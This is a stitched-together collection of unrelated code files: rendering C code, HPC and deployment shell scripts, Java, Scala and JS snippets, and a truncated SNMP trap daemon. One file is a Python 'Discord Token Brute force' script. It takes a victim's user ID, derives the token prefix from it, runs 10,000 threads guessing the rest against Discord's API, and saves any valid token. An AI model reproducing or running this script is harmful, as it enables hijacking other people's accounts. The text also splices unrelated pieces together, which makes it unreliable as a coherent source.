uint16_t ditherPattern16 = (ditherPattern8 << 8) | ditherPattern8;
uint8_t ditherPatternFinal = ditherPattern16 >> (ditherPatternOffset % 8);
ditherPatternOffset += 5; // a weird odd/prime number here that doesn't easily match up with 8 makes for less pattern-y artifacts
uint8_t pixel;
uint8_t y = 0;
uint8_t screenHeightPages = screenHeight / 8;
// pack 8 vertical pixels per page byte, LSB = topmost row of the page
for (uint8_t pageNum = 0; pageNum < screenHeightPages; pageNum++)
{
uint8_t pageData = 0;
for (uint8_t i = 0; i < 8; i++)
{
if (y >= y1 && y < y2)
pixel = 1;
else
pixel = 0;
pageData |= (pixel << i);
y++;
}
// apply the dither mask to the whole page at once
pageData &= ditherPatternFinal;
pPixelBuf[pixelBufferOffset] = pageData;
pixelBufferOffset++;
}
colRenderedCb();
}
// Maps percentage in [0.0, 1.0] onto the integer range [0, rangeHigh].
// The result is clamped at rangeHigh to guard against floating point error
// (percentage == 1.0 would otherwise land exactly on rangeHigh + 1).
uint32_t Renderer::MapPercentageToRange(double percentage, uint32_t rangeHigh)
{
    const double scaled = percentage * static_cast<double>(rangeHigh + 1);
    const auto mapped = static_cast<uint32_t>(scaled);
    return (mapped > rangeHigh) ? rangeHigh : mapped;
}
// Clamps a projected column height to the screen height and rasterises it to
// an integer pixel count (Rast is a project helper from GeomUtils/Utils).
uint8_t Renderer::GetClippedHeight(double height)
{
return static_cast<uint8_t>(Rast(height < screenHeight ? height : screenHeight));
}
|
#!/bin/bash
#SBATCH --time=90:55:00
#SBATCH --account=vhs
#SBATCH --job-name=sea_mem_4n_6t_6d_1000f_617m_15i
#SBATCH --nodes=4
#SBATCH --nodelist=comp02,comp03,comp04,comp06
#SBATCH --output=./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/slurm-%x-%j.out
source /home/vhs/Sea/.venv/bin/activate
export SEA_HOME=/home/vhs/Sea
# Remove any stale scratch directories from a previous run on every node.
srun -N4 rm -rf /disk0/vhs/seatmp /disk1/vhs/seatmp /disk2/vhs/seatmp /disk3/vhs/seatmp /disk4/vhs/seatmp /disk5/vhs/seatmp /dev/shm/seatmp
# BUG FIX: drop the page cache on ALL nodes. Previously this was
# `srun -N4 echo "..." && sync && echo 3 | sudo tee ...`, which ran only the
# echo under srun; sync and the cache drop executed on the submit node alone.
srun -N4 bash -c 'echo "Clearing cache" && sync && echo 3 | sudo tee /proc/sys/vm/drop_caches'
echo "Creating temp source mount directories"
srun -N4 mkdir /dev/shm/seatmp
srun -N4 mkdir /disk0/vhs/seatmp /disk1/vhs/seatmp /disk2/vhs/seatmp /disk3/vhs/seatmp /disk4/vhs/seatmp /disk5/vhs/seatmp
# Launch one Sea worker per node in parallel and time the whole batch.
start=$(date +%s.%N)
srun -N 1 bash ${SEA_HOME}/bin/sea_launch.sh ./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/n0_sea_parallel.sh &
srun -N 1 bash ${SEA_HOME}/bin/sea_launch.sh ./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/n1_sea_parallel.sh &
srun -N 1 bash ${SEA_HOME}/bin/sea_launch.sh ./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/n2_sea_parallel.sh &
srun -N 1 bash ${SEA_HOME}/bin/sea_launch.sh ./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/n3_sea_parallel.sh &
wait
end=$(date +%s.%N)
runtime=$( echo "$end - $start" | bc -l )
echo "Runtime: $runtime"
echo "Removing directories"
srun -N4 rm -rf /disk0/vhs/seatmp /disk1/vhs/seatmp /disk2/vhs/seatmp /disk3/vhs/seatmp /disk4/vhs/seatmp /disk5/vhs/seatmp /dev/shm/seatmp
|
<!DOCTYPE html>
<!-- Minimal static demo page: a two-column name/age table. -->
<html lang="en">
<head>
<!-- Declare the encoding explicitly so browsers don't fall back to sniffing. -->
<meta charset="utf-8">
<title>Table Example</title>
</head>
<body>
<h1>Table Heading</h1>
<table>
<tr>
<th>Name</th>
<th>Age</th>
</tr>
<tr>
<td>John</td>
<td>25</td>
</tr>
<tr>
<td>Alice</td>
<td>29</td>
</tr>
<tr>
<td>Bob</td>
<td>22</td>
</tr>
</table>
</body>
</html>
|
package br.com.alinesolutions.anotaai.model.produto;
import javax.persistence.Entity;
import javax.persistence.EnumType;
import javax.persistence.Enumerated;
import javax.persistence.ManyToOne;
import javax.persistence.NamedQueries;
import javax.validation.constraints.Min;
import javax.validation.constraints.NotNull;
import javax.xml.bind.annotation.XmlRootElement;
import org.hibernate.annotations.SQLDelete;
import org.hibernate.annotations.Where;
import br.com.alinesolutions.anotaai.metadata.model.domain.StatusMovimentacao;
import br.com.alinesolutions.anotaai.model.BaseEntity;
/**
 * Stock movement record for a product: a quantity plus a movement status.
 * Soft-deleted via @SQLDelete/@Where: deletes flip the `ativo` flag and
 * queries only ever see active rows.
 */
// NOTE(review): @NamedQueries is empty — presumably a placeholder; confirm
// whether it can be removed.
@NamedQueries({
})
@Entity
@Where(clause = "ativo = true")
@SQLDelete(sql = "update MovimentacaoProduto set ativo = false where id = ?")
@XmlRootElement
public class MovimentacaoProduto extends BaseEntity<Long, MovimentacaoProduto> {
private static final long serialVersionUID = 1L;
// moved quantity; must be at least 1
@NotNull
@Min(value = 1L)
private Long quantidade;
@NotNull
@ManyToOne(cascade = {})
private Produto produto;
// NOTE(review): ORDINAL persistence is fragile — reordering the enum
// changes stored meanings; confirm before editing StatusMovimentacao.
@NotNull
@Enumerated(EnumType.ORDINAL)
private StatusMovimentacao statusMovimentacao;
public Long getQuantidade() {
return quantidade;
}
public void setQuantidade(Long quantidade) {
this.quantidade = quantidade;
}
public Produto getProduto() {
return produto;
}
public void setProduto(Produto produto) {
this.produto = produto;
}
public StatusMovimentacao getStatusMovimentacao() {
return statusMovimentacao;
}
public void setStatusMovimentacao(StatusMovimentacao statusMovimentacao) {
this.statusMovimentacao = statusMovimentacao;
}
}
|
import discord
import string
import requests as req
import datetime
import random
import time
import base64
from threading import Thread as thr
import os
from colorama import Fore
import discord, os, json
from discord.ext import commands
from discord.ext.commands import Bot
from plyer import notification
os.system(f'title Discord Token Brute force By Naoy ^| Version : 1.2')
TOKEN = input(f"[>] Your token : ")
os.system('cls')
def notifyMe(title, message):
notification.notify(
title = title,
message = message,
app_icon="./nitro.ico",
)
class MyClient(discord.Client):
async def on_ready(self):
userid = input(f"[{Fore.RED}>{Fore.RESET}] Victim's ID : ")
user = await client.fetch_user(int(userid))
stamp = user.created_at
timestamp = str(time.mktime(stamp.timetuple()))
print(timestamp)
encodedBytes = base64.b64encode(userid.encode("utf-8"))
encodedid = str(encodedBytes, "utf-8")
encodedBytes = base64.b64encode(timestamp.encode("utf-8"))
encodedstamp = str(encodedBytes, "utf-8")
print(f"{Fore.WHITE}Attempting to crack {Fore.YELLOW}{user}{Fore.WHITE}'s token")
time.sleep(3)
for i in range(10000):
thr(target = gen, args = (encodedid, encodedstamp)).start()
def gen(encodedid, encodedstamp):
while True:
second = ('').join(random.choices(string.ascii_letters + string.digits + "-" + "_", k=6))
end = ('').join(random.choices(string.ascii_letters + string.digits + "-" + "_", k=27))
token = f"{encodedid}.{second}.{end}"
headers = {'Content-Type': 'application/json', 'authorization': token}
url = "https://discordapp.com/api/v6/users/@me/library"
r = req.get(url, headers=headers)
if r.status_code == 200:
print(f'{Fore.WHITE}{token} {Fore.BLACK}: {Fore.GREEN}Valid')
notifyMe("Token Finder", f"Le token de {user} Just Found The Token")
f = open("token.txt", "a")
f.write(token)
f.close()
exit(0)
else:
print(f'{Fore.WHITE}{token} {Fore.BLACK}: {Fore.RED}Invalid')
token = os.environ.get(TOKEN)
client = MyClient()
client.run(TOKEN, bot=False,)
|
package com.landawn.projecteuler._100;
import static org.junit.Assert.assertEquals;
import org.junit.Test;
import com.landawn.abacus.util.N;
import com.landawn.projecteuler.TestBase;
/**
 * Largest palindrome made from the product of two 3-digit numbers.
 *
 * s_1 exploits the fact that every 6-digit palindrome is divisible by 11,
 * so one factor only needs to step through multiples of 11.
 *
 * @see <a href="https://projecteuler.net/problem=4">Largest palindrome product</a>
 */
public class _004 extends TestBase {

    @Override
    @Test
    public void s_1() {
        int result = 0;
        // p walks the 3-digit multiples of 11 downwards; q walks all 3-digit numbers
        for (int p = 990; p > 99; p -= 11) {
            for (int q = 999; q > 99; q--) {
                int t = p * q;
                if (result < t && isPalindrome(t)) {
                    result = t;
                    break; // smaller q only shrinks t for this p — move on
                } else if (t < result) {
                    break; // t only decreases from here; nothing better for this p
                }
            }
        }
        N.println(result);
        // BUG FIX: the expected value was 998899, which is impossible — the
        // largest product in range is 990 * 999 = 989010. The correct answer
        // to Project Euler #4 is 906609 = 913 * 993.
        assertEquals(906609, result);
    }

    @Override
    @Test
    public void s_2() {
        int max = 100001;
        for (int i = 999; i >= 100; i--) {
            if (max >= i * 999) {
                break; // no remaining product can beat the current maximum
            }
            for (int j = 999; j >= i; j--) {
                int p = i * j;
                if (max < p && isPalindrome(p)) {
                    max = p;
                }
            }
        }
        N.println(max);
        // Assert the known answer for consistency with s_1 (previously this
        // strategy printed the result without verifying it).
        assertEquals(906609, max);
    }
}
|
#!/bin/bash
# Reads the deployment region from package.json and ensures the service-linked
# role required by Amazon Elasticsearch exists in that region.
AWS_REGION=$(jq -r '.stack.region' ./package.json)
# BUG FIX: the message previously interpolated the undefined $REGION variable;
# use the AWS_REGION actually read above.
echo "==Attempting to add service role to Amazon Elasticsearch in region $AWS_REGION=="
# BUG FIX: the old form `$(aws ... && echo msg) || echo other` captured the
# command's stdout and then tried to EXECUTE it as a command, so the success
# message was never printed correctly. Use a plain if/else instead.
if aws iam create-service-linked-role --region "$AWS_REGION" --aws-service-name es.amazonaws.com >/dev/null; then
  echo "Service role successfully added"
else
  echo "Service role already exists"
fi
|
#!/usr/bin/env bash
# Build sdist + wheel and upload to PyPI.
# Fail fast so a broken build never reaches `twine upload` (previously the
# upload ran even when the build failed).
set -euo pipefail
python3 setup.py sdist bdist_wheel
twine upload dist/*
|
<reponame>shrishankit/prisma<filename>server/servers/api/src/test/scala/com/prisma/api/schema/MutationsSchemaBuilderSpec.scala
package com.prisma.api.schema
import com.prisma.api.ApiSpecBase
import com.prisma.shared.schema_dsl.{SchemaDsl, TestProject}
import com.prisma.util.GraphQLSchemaMatchers
import org.scalatest.{FlatSpec, Matchers}
import sangria.renderer.SchemaRenderer
class MutationsSchemaBuilderSpec extends FlatSpec with Matchers with ApiSpecBase with GraphQLSchemaMatchers {
val schemaBuilder = testDependencies.apiSchemaBuilder
"the create Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("createTodo(data: TodoCreateInput!): Todo!")
schema should containInputType("TodoCreateInput", fields = Vector("title: String!", "tag: String"))
}
"the create Mutation for a model with relations" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
s"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
| comments: [Comment] @relation(name:"TodoComments" $listInlineArgument)
| topComment: Comment! @relation(link: INLINE, name: "TopComments")
|}
|
|type Comment {
| id: ID! @id
| text: String!
| todo: Todo @relation(name:"TodoComments")
| topCommentFor: Todo! @relation(name:"TopComments")
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
// from Todo to Comment
schema should containMutation("createTodo(data: TodoCreateInput!): Todo!")
schema should containInputType(
"TodoCreateInput",
fields = Vector(
"title: String!",
"tag: String",
"comments: CommentCreateManyWithoutTodoInput",
"topComment: CommentCreateOneWithoutTopCommentForInput!"
)
)
schema should containInputType("CommentCreateManyWithoutTodoInput",
fields = Vector(
"create: [CommentCreateWithoutTodoInput!]",
"connect: [CommentWhereUniqueInput!]"
))
schema should containInputType("CommentCreateWithoutTodoInput", fields = Vector("text: String!"))
// from Comment to Todo
schema should containInputType("CommentCreateInput",
fields = Vector(
"text: String!",
"todo: TodoCreateOneWithoutCommentsInput"
))
schema should containInputType("TodoCreateOneWithoutCommentsInput",
fields = Vector(
"create: TodoCreateWithoutCommentsInput",
"connect: TodoWhereUniqueInput"
))
schema should containInputType("TodoCreateWithoutCommentsInput",
fields = Vector(
"title: String!",
"tag: String"
))
}
"the update Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
| alias: String @unique
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("updateTodo(data: TodoUpdateInput!, where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoUpdateInput",
fields = Vector(
"title: String",
"alias: String"
))
schema should containInputType("TodoWhereUniqueInput",
fields = Vector(
"id: ID",
"alias: String"
))
}
"the update Mutation for a model with a optional backrelation" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
s"""
|type List {
| id: ID! @id
| listUnique: String! @unique
| optList: String
| todoes: [Todo] $listInlineDirective
|}
|
|type Todo {
| id: ID! @id
| todoUnique: String! @unique
| optString: String
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("updateTodo(data: TodoUpdateInput!, where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoCreateInput",
fields = Vector(
"todoUnique: String!",
"optString: String"
))
schema should containInputType("TodoUpdateInput",
fields = Vector(
"todoUnique: String",
"optString: String"
))
schema should containInputType("TodoUpdateDataInput",
fields = Vector(
"todoUnique: String",
"optString: String"
))
schema should containInputType("TodoWhereUniqueInput",
fields = Vector(
"id: ID",
"todoUnique: String"
))
schema should containInputType("TodoUpdateWithWhereUniqueNestedInput",
fields = Vector(
"where: TodoWhereUniqueInput!",
"data: TodoUpdateDataInput!"
))
schema should containInputType("TodoUpsertWithWhereUniqueNestedInput",
fields = Vector(
"where: TodoWhereUniqueInput!",
"update: TodoUpdateDataInput!",
"create: TodoCreateInput!"
))
}
"the update Mutation for a model with relations" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
s"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
| comments: [Comment] $listInlineDirective
|}
|
|type Comment {
| id: ID! @id
| text: String!
| todo: Todo
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
// from Todo to Comment
schema should containMutation("updateTodo(data: TodoUpdateInput!, where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoUpdateInput",
fields = Vector(
"title: String",
"tag: String",
"comments: CommentUpdateManyWithoutTodoInput"
))
schema should containInputType(
"CommentUpdateManyWithoutTodoInput",
fields = Vector(
"create: [CommentCreateWithoutTodoInput!]",
"connect: [CommentWhereUniqueInput!]",
"disconnect: [CommentWhereUniqueInput!]",
"delete: [CommentWhereUniqueInput!]",
"update: [CommentUpdateWithWhereUniqueWithoutTodoInput!]",
"upsert: [CommentUpsertWithWhereUniqueWithoutTodoInput!]"
)
)
schema should containInputType("CommentCreateWithoutTodoInput",
fields = Vector(
"text: String!"
))
schema should containInputType("CommentUpdateWithWhereUniqueWithoutTodoInput",
fields = Vector(
"where: CommentWhereUniqueInput!",
"data: CommentUpdateWithoutTodoDataInput!"
))
schema should containInputType("CommentUpdateWithoutTodoDataInput",
fields = Vector(
"text: String"
))
schema should containInputType(
"CommentUpsertWithWhereUniqueWithoutTodoInput",
fields = Vector(
"where: CommentWhereUniqueInput!",
"update: CommentUpdateWithoutTodoDataInput!",
"create: CommentCreateWithoutTodoInput!"
)
)
// from Comment to Todo
schema should containInputType("CommentUpdateInput",
fields = Vector(
"text: String",
"todo: TodoUpdateOneWithoutCommentsInput"
))
schema should containInputType(
"TodoUpdateOneWithoutCommentsInput",
fields = Vector(
"create: TodoCreateWithoutCommentsInput",
"connect: TodoWhereUniqueInput",
"disconnect: Boolean",
"delete: Boolean",
"update: TodoUpdateWithoutCommentsDataInput"
)
)
schema should containInputType("TodoCreateWithoutCommentsInput",
fields = Vector(
"title: String!",
"tag: String"
))
schema should containInputType("TodoUpdateWithoutCommentsDataInput",
fields = Vector(
"title: String",
"tag: String"
))
}
"the update and upsert Mutation for a model with omitted back relation" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
s"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
| comments: [Comment] $listInlineDirective
|}
|
|type Comment {
| id: ID! @id
| text: String!
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containInputType(
"CommentUpdateManyInput",
fields = Vector(
"create: [CommentCreateInput!]",
"connect: [CommentWhereUniqueInput!]",
"disconnect: [CommentWhereUniqueInput!]",
"delete: [CommentWhereUniqueInput!]",
"update: [CommentUpdateWithWhereUniqueNestedInput!]",
"upsert: [CommentUpsertWithWhereUniqueNestedInput!]"
)
)
}
"the upsert Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("upsertTodo(where: TodoWhereUniqueInput!, create: TodoCreateInput!, update: TodoUpdateInput!): Todo!")
}
"the delete Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("deleteTodo(where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoWhereUniqueInput",
fields = Vector(
"id: ID"
))
}
"the delete Mutation for a model" should "be generated correctly and contain all non-list unique fields" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
| unique: Int @unique
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("deleteTodo(where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoWhereUniqueInput",
fields = Vector(
"id: ID",
"unique: Int"
))
}
"the deleteMany Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("deleteManyTodoes(where: TodoWhereInput): BatchPayload!")
schema should containInputType("TodoWhereInput")
}
"the updateMany Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("updateManyTodoes(data: TodoUpdateManyMutationInput!, where: TodoWhereInput): BatchPayload!")
schema should containInputType("TodoWhereInput")
}
"the executeRaw mutation" should "be there if raw access is enabled" in {
val project = TestProject.emptyV11
val schemaBuilder = SchemaBuilderImpl(project, enableRawAccess = true)
val schema = SchemaRenderer.renderSchema(schemaBuilder.build())
schema should containMutation("executeRaw(database: PrismaDatabase, query: String!): Json")
}
"the executeRaw mutation" should "not be there if raw access is disabled" in {
val project = TestProject.emptyV11
val schemaBuilder = SchemaBuilderImpl(project, enableRawAccess = false)
val schema = SchemaRenderer.renderSchema(schemaBuilder.build())
schema should not(containMutation("executeRaw(database: PrismaDatabase, query: String!): Json"))
}
}
|
<gh_stars>0
import styled from 'styled-components';
import {FixedSizeList} from 'react-window';
import {fontPolyglot} from '../../../styles/polyglot.js';
// Virtualised fixed-size list styled with the shared polyglot font stack.
const List = styled(FixedSizeList)`${fontPolyglot}`;
export {List};
|
#!/usr/bin/env bash
# Deploy VMOP to the given cluster
#
# Usage:
# $ deploy-local.sh <deploy_yaml> <vmclasses_yaml>
set -o errexit
set -o pipefail
set -o nounset
YAML=$1
VMCLASSES_YAML=$2
KUBECTL="kubectl"
VMOP_NAMESPACE="vmware-system-vmop"
VMOP_DEPLOYMENT="vmware-system-vmop-controller-manager"
# Remember whether VMOP is already deployed so we can restart it after apply.
DEPLOYMENT_EXISTS=""
if $KUBECTL get deployment -n ${VMOP_NAMESPACE} ${VMOP_DEPLOYMENT} >/dev/null 2>&1; then
DEPLOYMENT_EXISTS=1
fi
# Deploy and check cert-manager
CERTMANAGER_NAMESPACE="vmware-system-cert-manager"
CERTMANAGER_DEPLOYMENTS=(
cert-manager
cert-manager-cainjector
cert-manager-webhook
)
CERTMAN_EXISTS=""
if $KUBECTL get deployment -n "${CERTMANAGER_NAMESPACE}" "${CERTMANAGER_DEPLOYMENTS[0]}" >/dev/null 2>&1 ; then
CERTMAN_EXISTS="exists"
fi
# Install cert-manager only when absent, then wait for each deployment.
if [[ -z $CERTMAN_EXISTS ]]; then
./hack/deploy-local-certmanager.sh
for dep in "${CERTMANAGER_DEPLOYMENTS[@]}"; do
$KUBECTL rollout status -n "${CERTMANAGER_NAMESPACE}" deployment "${dep}"
done
# TODO Find a better way to wait for this...
echo $'\nSleeping for 60s - waiting for webhooks to be initialized\n'
sleep 60
fi
# Hack to reduce the number of replicas deployed from 3 to 1
# when deploying onto a single node kind cluster.
NODE_COUNT=$(kubectl get node --no-headers 2>/dev/null | wc -l)
if [ "$NODE_COUNT" -eq 1 ]; then
sed -i -e 's/replicas: 3/replicas: 1/g' "$YAML"
# remove the generated '-e' file on Mac
rm -f "$YAML-e"
fi
$KUBECTL apply -f "$YAML"
# If VMOP was already running, bounce it so the new image/config is picked up.
if [[ -n $DEPLOYMENT_EXISTS ]]; then
$KUBECTL rollout restart -n ${VMOP_NAMESPACE} deployment ${VMOP_DEPLOYMENT}
$KUBECTL rollout status -n ${VMOP_NAMESPACE} deployment ${VMOP_DEPLOYMENT}
fi
# Wait for the serving certificate before touching the webhook-backed CRDs.
until $KUBECTL wait --for=condition=Ready -n vmware-system-vmop cert/vmware-system-vmop-serving-cert; do
sleep 1
done
# Hack that retries applying the default VM Classes until the
# validating webhook is available.
VMOP_VMCLASSES_ATTEMPTS=0
while true; do
kubectl apply -f "${VMCLASSES_YAML}" && break
VMOP_VMCLASSES_ATTEMPTS=$((VMOP_VMCLASSES_ATTEMPTS + 1))
if [[ $VMOP_VMCLASSES_ATTEMPTS -ge 60 ]]; then
echo "Failed to apply default VM Classes"
exit 1
fi
echo "Cannot create default VM Classes. Trying again."
sleep "5s"
done
|
#!/usr/bin/env bash
# Launches one training run per (seed, subtask) combination of the
# pusher/SAC objective test, logging each run under its own directory.
# #### #
# VARS #
# #### #
expt_name='objective_test'
env_name='pusher'
algo_name='sac'
dir_prefix=${algo_name}
python_script=${env_name}'_'${algo_name}
log_dir_path='/home/desteban/logs/'${expt_name}'/'${env_name}'/'
#default_seeds=(610 710 810 910 1010)
default_seeds=(610)
# Positional args override the default seed list (and, below, subtasks).
seeds=("${@:-${default_seeds[@]}}")
total_seeds=${#seeds[@]}
#init_index=0
#end_index=3
#seeds=("${seeds[@]:${init_index}:${end_index}}")
#default_subtasks=(0 1 -1)
default_subtasks=(-1)
subtasks=("${@:-${default_subtasks[@]}}")
total_subtasks=${#subtasks[@]}
total_scripts=$(($total_seeds * $total_subtasks))
echo "Robolearn DRL script"
echo "Total seeds: ${#seeds[@]}"
echo "Experiment seeds: ${seeds[@]}"
echo ""
# One run per (seed, subtask); script_index is just a progress counter.
for seed_idx in ${!seeds[@]}; do
for subtask_idx in ${!subtasks[@]}; do
seed=${seeds[seed_idx]}
subtask=${subtasks[subtask_idx]}
# script_index=$((index+init_index))
script_index=$(((seed_idx)*total_subtasks + subtask_idx))
echo "********************************************************"
echo "Running '${python_script}.py' $((script_index+1))/${total_scripts} | Seed: ${seed} Subtask: ${subtask}"
# NOTE(review): this reassignment of expt_name is never used afterwards —
# --expt_name below passes env_name instead; confirm which was intended.
expt_name='sub'${subtask}_${algo_name}_${seed}
echo "Log_dir '${log_dir_path}'"
log_dir=${log_dir_path}'sub'${subtask}'/'${dir_prefix}_${seed}
python ../${python_script}.py --seed ${seed} --subtask ${subtask} \
--log_dir ${log_dir} --expt_name ${env_name} --gpu
done
done
|
/*
* straps.c --
*
* A simple SNMP trap-sink. Mainly for scotty's snmp code, but also
* usable by other clients. The straps demon listens to the snmp-trap
* port 162/udp and forwards the received event to connected clients
* (like scotty). Because the port 162 needs root access and the port
* can be opened only once, the use of a simple forwarding demon is
* a good choice.
*
* The client can connect to the AF_UNIX domain stream socket
* /tmp/.straps-<port> and will get the trap-packets in raw binary form:
*
* 4 bytes ip-address (in network-byte-order) of the sender
* 2 bytes port-number (in network-byte-order) of the sender
* 4 bytes data-length (in host-byte-order) followed by the
* n data-bytes of the packet.
*
* Copyright (c) 1994-1996 Technical University of Braunschweig.
*
* See the file "license.terms" for information on usage and redistribution
* of this file, and for a DISCLAIMER OF ALL WARRANTIES.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/un.h>
#include <sys/stat.h>
#include "config.h"
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef HAVE_SYS_SELECT_H
#include <sys/select.h>
#endif
#ifndef FD_SETSIZE
#define FD_SETSIZE 32
#endif
/*
* Default values for the SNMP trap port number, the name of
* the UNIX domain socket and the IP multicast address.
*/
#define SNMP_TRAP_PORT 162
#define SNMP_TRAP_NAME "snmp-trap"
#define SNMP_TRAP_PATH "/tmp/.straps"
#define SNMP_TRAP_MCIP "172.16.58.3"
/*
* A signal handler which basically ignores all SIGPIPE signals.
* It re-installs itself for all the bozo's outside.
*/
#ifdef SIGPIPE
/*
 * Ignore SIGPIPE so a client that disconnects mid-write cannot kill the
 * demon; the failed write() is detected and handled by the caller.
 */
static void
ign_pipe(dummy)
int dummy;
{
    /* classic signal() semantics may reset the handler to SIG_DFL on
     * delivery, so re-install ourselves every time we are invoked */
    signal(SIGPIPE, ign_pipe);
}
#endif
/*
 * Read one trap packet from sock and forward it in the documented raw
 * binary form (4 bytes sender IP, 2 bytes sender port, 4 bytes length,
 * then the payload) to every connected client.  Clients whose write
 * fails are closed and dropped.  Returns the number of clients still
 * connected afterwards, which the caller uses as its go_on flag — note
 * this preserves the original behavior of exiting once no clients
 * remain after a trap has been processed.
 */
static int
forward_trap(sock, cl_addr)
int sock;
int *cl_addr;
{
    struct sockaddr_in laddr;
    socklen_t llen = sizeof(laddr);     /* bug fix: was size_t; recvfrom
                                           expects socklen_t (width
                                           mismatch on LP64 systems) */
    char buf[2048];
    int rc, i, live = 0;

    if ((rc = recvfrom(sock, buf, sizeof(buf), 0,
                       (struct sockaddr *) &laddr, &llen)) < 0) {
        perror("straps: recvfrom failed");
    } else {
        for (i = 0; i < FD_SETSIZE; i++) {
            if (cl_addr[i] > 0) {
                printf("forwarding to %d\n", i);
                /* XXX: check writeability */
                if (write(i, (char *) &laddr.sin_addr.s_addr, 4) != 4
                    || write(i, (char *) &laddr.sin_port, 2) != 2
                    || write(i, (char *) &rc, 4) != 4
                    || write(i, buf, rc) != rc) {
                    cl_addr[i] = 0;
                    close(i);
                }
            }
        }
    }

    /* should we go on ? */
    for (i = 0; i < FD_SETSIZE; i++) {
        live += cl_addr[i] > 0;
    }
    return live;
}

/*
 * Set up the trap socket (and optionally a multicast trap socket), the
 * AF_UNIX server socket, then loop on select() forwarding traps to the
 * connected clients until the last client disconnects.
 */
int
main(argc, argv)
int argc;
char *argv[];
{
    struct servent *se;
    struct sockaddr_in taddr;
    struct sockaddr_un saddr, daddr;
    socklen_t dlen;                     /* bug fix: accept expects socklen_t */
    int trap_s, serv_s, slen, rc, i;
    fd_set fds;
    static int cl_addr [FD_SETSIZE];    /* cl_addr[fd] > 0 => connected client */
    char path[1024];
    int go_on;
    int mcast_s = -1;
    char *name;
    int port;

    /*
     * Check the number of arguments. We accept an optional argument
     * which specifies the port number we are listening on.
     */
    if (argc > 2) {
        fprintf(stderr, "usage: straps [port]\n");
        exit(1);
    }
    if (argc > 1) {
        name = argv[1];
        port = atoi(argv[1]);
    } else {
        name = SNMP_TRAP_NAME;
        port = SNMP_TRAP_PORT;
    }

    /*
     * Get the port that we are going to listen to. Check that
     * we do not try to open a priviledged port number, with
     * the exception of the SNMP trap port.
     */
#ifdef HAVE_GETSERVBYNAME
    if ((se = getservbyname(name, "udp"))) {
        port = ntohs(se->s_port);
    }
    if (port != SNMP_TRAP_PORT && port < 1024) {
        fprintf(stderr, "straps: access to port %d denied\n", port);
        exit(1);
    }
#endif

    /*
     * Open and bind the normal trap socket:
     */
    if ((trap_s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
        perror("straps: unable to open trap socket");
        exit(1);
    }
    taddr.sin_family = AF_INET;
    taddr.sin_port = htons(port);
    taddr.sin_addr.s_addr = INADDR_ANY;
    if (bind(trap_s, (struct sockaddr *) &taddr, sizeof(taddr)) < 0) {
        perror("straps: unable to bind trap socket");
        exit(1);
    }

#ifdef HAVE_MULTICAST
    if ((mcast_s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
        perror("straps: unable to open multicast trap socket");
    }
    if (mcast_s > 0) {
        struct ip_mreq mreq;
        mreq.imr_multiaddr.s_addr = inet_addr(SNMP_TRAP_MCIP);
        mreq.imr_interface.s_addr = htonl(INADDR_ANY);
        if (setsockopt(mcast_s, IPPROTO_IP, IP_ADD_MEMBERSHIP, (char*) &mreq,
                       sizeof(mreq)) == -1) {
            perror("straps: unable to join multicast group");
            close(mcast_s);
            mcast_s = -1;
        }
    }
#ifdef SO_REUSEADDR
    /*
     * Allow others to bind to the same UDP port.
     */
    if (mcast_s > 0) {
